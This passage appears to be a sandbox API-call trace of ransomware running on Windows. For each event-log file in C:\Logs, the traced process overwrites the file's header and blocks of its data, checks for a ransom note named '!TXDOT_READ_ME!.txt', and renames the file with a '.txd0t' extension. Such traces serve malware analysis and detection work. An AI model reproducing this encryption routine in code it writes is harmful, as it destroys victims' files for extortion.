"c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx.txd0t")) returned 1 [0087.955] SetEvent (hEvent=0x414) returned 1 [0087.955] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0087.970] StrCpyW (in: psz1=0x53ef7a0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" [0087.970] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.txd0t" [0087.970] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.txd0t") returned 0 [0087.970] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0087.976] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0087.976] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=1118208) returned 1 [0087.977] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.978] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0087.979] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffeeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.979] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x53ef760, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef760*=0x100000, lpOverlapped=0x0) returned 1 [0088.005] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.005] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x53ef764, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef764*=0x100000, lpOverlapped=0x0) returned 1 [0088.008] FlushFileBuffers (hFile=0x474) returned 1 [0088.019] GetProcessHeap () returned 0xe30000 [0088.019] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x120) returned 0xe9b648 [0088.019] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" [0088.019] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned="Microsoft-Windows-AppReadiness%4Operational.evtx" [0088.020] StrCpyW (in: psz1=0xe9b660, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.020] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.020] GetProcessHeap () returned 0xe30000 [0088.020] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0088.020] CloseHandle (hObject=0x474) returned 1 [0088.020] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx.txd0t")) returned 1 [0088.020] SetEvent (hEvent=0x414) returned 1 [0088.020] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0088.025] StrCpyW (in: psz1=0x53ef790, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" [0088.025] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.txd0t" [0088.025] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.txd0t") returned 0 [0088.026] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0088.026] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0088.026] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=2166784) returned 1 [0088.026] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.026] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0088.027] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffdeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.027] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x53ef750, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef750*=0x100000, lpOverlapped=0x0) returned 1 [0088.073] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.073] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x53ef754, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef754*=0x100000, lpOverlapped=0x0) returned 1 [0088.076] FlushFileBuffers (hFile=0x474) returned 1 [0088.083] GetProcessHeap () returned 0xe30000 [0088.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x130) returned 0xe9b648 [0088.084] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" [0088.084] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" [0088.084] StrCpyW (in: psz1=0xe9b660, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.084] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.084] GetProcessHeap () returned 0xe30000 [0088.084] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0088.084] CloseHandle (hObject=0x474) returned 1 [0088.084] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx.txd0t")) returned 1 [0088.085] SetEvent (hEvent=0x414) returned 1 [0088.085] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0088.087] StrCpyW (in: psz1=0x53ef790, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" [0088.087] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.txd0t" [0088.087] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.txd0t") returned 0 [0088.087] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", dwFileAttributes=0x80) returned 1 [0088.089] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0088.090] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=69632) returned 1 [0088.090] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.090] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0088.091] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.091] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x53ef750, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef750*=0x11000, lpOverlapped=0x0) returned 1 [0088.094] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.094] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x53ef754, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef754*=0x11000, lpOverlapped=0x0) returned 1 [0088.095] FlushFileBuffers (hFile=0x474) returned 1 [0088.101] GetProcessHeap () returned 0xe30000 [0088.101] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x12e) returned 0xe9b648 [0088.102] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" [0088.102] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" [0088.102] StrCpyW (in: psz1=0xe9b660, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.102] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.102] GetProcessHeap () returned 0xe30000 [0088.102] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0088.102] CloseHandle (hObject=0x474) returned 1 [0088.102] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx.txd0t")) returned 1 [0088.103] SetEvent (hEvent=0x414) returned 1 [0088.103] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0088.106] StrCpyW (in: psz1=0x53ef780, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" [0088.106] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.txd0t" [0088.106] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.txd0t") returned 0 [0088.106] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0088.108] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0088.108] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=69632) returned 1 [0088.108] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.108] WriteFile (in: hFile=0x460, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0088.109] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.109] ReadFile (in: hFile=0x460, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x53ef740, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef740*=0x11000, lpOverlapped=0x0) returned 1 [0088.114] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.114] WriteFile (in: hFile=0x460, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x53ef744, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef744*=0x11000, lpOverlapped=0x0) returned 1 [0088.115] FlushFileBuffers (hFile=0x460) returned 1 [0088.127] GetProcessHeap () returned 0xe30000 [0088.127] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x140) returned 0xe9b648 [0088.127] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" [0088.127] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" [0088.127] StrCpyW (in: psz1=0xe9b660, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.127] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.127] GetProcessHeap () returned 0xe30000 [0088.127] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0088.127] CloseHandle (hObject=0x460) returned 1 [0088.127] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx.txd0t")) returned 1 [0088.128] SetEvent (hEvent=0x414) returned 1 [0088.128] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0088.131] StrCpyW (in: psz1=0x53ef780, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" [0088.131] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.txd0t" [0088.131] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.txd0t") returned 0 [0088.131] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0088.131] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0088.131] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=69632) returned 1 [0088.131] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.131] WriteFile (in: hFile=0x464, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0088.132] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.132] ReadFile (in: hFile=0x464, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x53ef740, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef740*=0x11000, lpOverlapped=0x0) returned 1 [0088.137] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.137] WriteFile (in: hFile=0x464, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x53ef744, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef744*=0x11000, lpOverlapped=0x0) returned 1 [0088.138] FlushFileBuffers (hFile=0x464) returned 1 [0088.427] GetProcessHeap () returned 0xe30000 [0088.427] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x13e) returned 0xe9b648 [0088.427] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" [0088.428] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" [0088.428] StrCpyW (in: psz1=0xe9b660, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.428] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.428] GetProcessHeap () returned 0xe30000 [0088.428] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0088.428] CloseHandle (hObject=0x464) returned 1 [0088.429] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx.txd0t")) returned 1 [0088.429] SetEvent (hEvent=0x414) returned 1 [0088.429] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0088.430] StrCpyW (in: psz1=0x53ef7a0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" [0088.430] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.txd0t" [0088.430] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.txd0t") returned 0 [0088.430] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx", dwFileAttributes=0x80) returned 1 [0088.431] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0088.432] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=69632) returned 1 [0088.432] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.432] WriteFile (in: hFile=0x464, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0088.433] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.433] ReadFile (in: hFile=0x464, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x53ef760, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef760*=0x11000, lpOverlapped=0x0) returned 1 [0088.462] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.462] WriteFile (in: hFile=0x464, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x53ef764, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef764*=0x11000, lpOverlapped=0x0) returned 1 [0088.462] FlushFileBuffers (hFile=0x464) returned 1 [0088.755] GetProcessHeap () returned 0xe30000 [0088.755] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x120) returned 0xed7f88 [0088.755] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" [0088.755] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned="Microsoft-Windows-DeviceSetupManager%4Admin.evtx" [0088.755] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.755] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.755] GetProcessHeap () returned 0xe30000 [0088.755] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0088.755] CloseHandle (hObject=0x464) returned 1 [0088.755] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx.txd0t")) returned 1 [0088.756] 